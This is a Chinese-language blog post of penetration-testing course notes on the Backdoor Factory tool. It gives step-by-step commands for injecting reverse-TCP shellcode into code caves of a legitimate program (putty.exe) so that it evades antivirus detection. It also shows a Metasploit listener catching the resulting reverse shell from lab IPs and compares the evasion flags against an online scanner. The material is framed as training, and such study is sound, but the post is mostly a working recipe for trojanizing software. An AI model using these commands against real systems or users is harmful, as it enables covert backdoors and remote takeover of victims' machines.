Kali Linux渗透测试 137 后门工具--Backdoor-factory

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 简介

  • patch

    • 通过替换 exe、dll、注册表等方法修复系统漏洞或问题的方法
    • bdf:向二进制文件中增加或者删除代码内容
      • 某些受保护的二进制程序无法 patch
      • 存在一定概率问价你会被 patch 坏掉
  • 后门工厂

    • 使用于 windows PE x32/64 和 linux ELF x32/64 (OSX)
    • 支持 msf payload、自定义 payload
  • 将 shellcode 代码 patch 进模板文件,躲避 AV 检查

  • python 语言编写

  • msf 使用的 patch 方法

    • 覆盖程序入口

      • msfvenom -p windows/shell/reverse_tcp
    • 创建新的线程执行 shellcode 并跳回原程序入口

      • msfvenom -p windows/shell/reverse_tcp –k
      • 增加代码片段跳转执行后跳回源程序入口
  • CTP 方法

    • 增加新的代码段 session,与 smf 的-k 方法类似
    • 使用现有的代码裂缝/洞(code cave)存放 shellcode
  • 代码洞

    • 二进制中超过两个字节的连续 x00 区域(代码片段间区域)
    • 根据统计判断代码洞是编译在进行编译是造成的,不同的编译器造成的代码洞的大小不同

  • 单个代码洞代销不足以存放完整的 shellcode

    • 多代码洞跳转(非顺序执行)

      • 初期免杀率可达100%
    • 结合 msf 的 stager 方法

  • patch 选项

    • 附加代码段
    • 单代码洞注入
    • 多代码注入
  • BDF 基本使用

    • 检查二进制文件是否支持代码注入

      • backdoor-factory -f putty.exe –S
    • 显示可用 payload

      • backdoor-factory -f putty.exe -s show
      • backdoor-factory -f which nc -s show
      • backdoor-factory -f putty.exe -s show iat_reverse_tcp_stager_threaded -H 10.10.10.133 -P 4444
      • 默认单一代码洞,选项 .rdata --> 查看文件 --> 查病毒
      • 使用 msf 侦听 set payload windows/meterpreter/revers_tcp set LHOST 10.10.10.131 set LPORT 4444 run
    • 查看 cave 大小

      • ackdoor-factory -f putty.exe -c -l
  • 免杀效果对比

    • backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 1.1.1.1 -P 6666
    • backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 1.1.1.1 -P 6666 –J
    • backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.20.8 -P 6666 -a
  • 与 veil-evasion 集成

  • Linux:backdoor-factory -f putty.exe -s show

  • IAT:import address table

  • 指针指向 WinAPI 地址,被称为 thunks (形实转换程序),地址预定义

2. 使用

  • -S:检查二进制文件是否支持代码注入

      root@kali:~# backdoor-factory -f putty.exe –S
    

    Kali Linux渗透测试 137 后门工具--Backdoor-factory_第1张图片

  • -c: 在确定其支持patch 后,我们再来查看其是否支持我们指定的 shellcode patch

      -c:code cave(代码裂缝)
      -l:代码裂缝大小
      root@kali:~# backdoor-factory -f putty.exe -c -l 200
    

    Kali Linux渗透测试 137 后门工具--Backdoor-factory_第2张图片

  • -s SHELL, --shell=SHELL: 可以使用的有效负载。使用“show”来查看有效载荷

      root@kali:~# backdoor-factory -f putty.exe -s show
    

    Kali Linux渗透测试 137 后门工具--Backdoor-factory_第3张图片

      root@kali:~# backdoor-factory -f `which nc` -s show
    

    Kali Linux渗透测试 137 后门工具--Backdoor-factory_第4张图片

  • 注入 putty.exe,报错

      root@kali:~# backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 10.10.10.131 -P 4444 -o putty2.exe
    

    Kali Linux渗透测试 137 后门工具--Backdoor-factory_第5张图片

      [!] Enter your selection: 2
    

    Kali Linux渗透测试 137 后门工具--Backdoor-factory_第6张图片

  • 显示未找到文件

      Failed to read certificate file: /usr/share/backdoor-factory/certs/Verisign.cer
      139701503748160:error:02001002:system library:fopen:No such file or directory:bss_file.c:175:fopen('/usr/share/backdoor-factory/certs/VerisignPrivateKey.pem','rb')
      139701503748160:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:182:
      139701503748160:error:02001002:system library:fopen:No such file or directory:bss_file.c:175:fopen('/usr/share/backdoor-factory/certs/Verisign.cer','rb')
      139701503748160:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:182:
      Failed
      File putty5.exe is in the 'backdoored' directory
    
  • 修复错误(备份并重命名)

      root@kali:~# cat /usr/share/backdoor-factory/certs/
      passFile.txt           signingCert.cer        signingPrivateKey.pem  
      root@kali:~# cd /usr/share/backdoor-factory/certs/
    
      root@kali:/usr/share/backdoor-factory/certs# cp signingCert.cer signingCert.cer.bak
      root@kali:/usr/share/backdoor-factory/certs# mv signingCert.cer Verisign.cer
      root@kali:/usr/share/backdoor-factory/certs# cp signingPrivateKey.pem signingPrivateKey.pem.bak
      root@kali:/usr/share/backdoor-factory/certs# mv signingPrivateKey.pem VerisignPrivateKey.pem
    
      root@kali:~# backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 10.10.10.131 -P 4444 -o putty2.exe
    

    Kali Linux渗透测试 137 后门工具--Backdoor-factory_第7张图片

  • 使用 msf 侦听

      msf > use exploit/multi/handler
      msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
      msf exploit(multi/handler) > set LHOST 10.10.10.131
      msf exploit(multi/handler) > set LPORT 4444
      msf exploit(multi/handler) > run
    

    Kali Linux渗透测试 137 后门工具--Backdoor-factory_第8张图片

  • windows 运行被注入 putty2.exe 程序,kali 反弹成功

  • 免杀效果比较

    查病毒网站:http://www.virscan.org/scan/

      backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 10.10.10.131 -P 4444 --output-file=putty3.exe
      backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 10.10.10.131 -P 4444 --output-file=putty4.exe –J
      backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 10.10.10.131 -P 4444 --output-file=putty5.exe -a
    
  • 与 veil-evasion 集成

      root@kali:~# veil-evasion
      [menu>>]: list
    

    Kali Linux渗透测试 137 后门工具--Backdoor-factory_第9张图片

你可能感兴趣的:(kali-linux)